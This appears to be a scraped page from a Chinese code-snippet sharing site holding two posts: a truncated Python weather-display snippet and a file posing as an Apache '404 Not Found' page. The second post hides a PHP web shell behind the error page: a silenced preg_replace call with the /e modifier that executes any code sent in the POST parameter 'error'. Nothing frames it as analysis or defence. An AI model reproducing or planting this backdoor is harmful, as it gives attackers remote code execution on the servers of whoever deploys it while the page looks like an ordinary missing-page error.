import requests
import json
list1=['day','week','wea','tem','tem1','tem2','win','win_speed','air_level','air_tips'] list2=['','','天气: ','温度: ','最高温度: ','最低温度: ','风向: ','风速: ','空气质量: ','建议: ']
def show(days):
for i in range(10):
r=str(list2[i])+str(days[list1[i]])
print(r)
def show2(days):
......................
阅读全部
|
fighting910
贴于 2019年7月25日 19:15
hide
bbsi
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
?>
阅读全部
|
JYF789JKL
贴于 2019年7月5日 16:05
hide
bbsi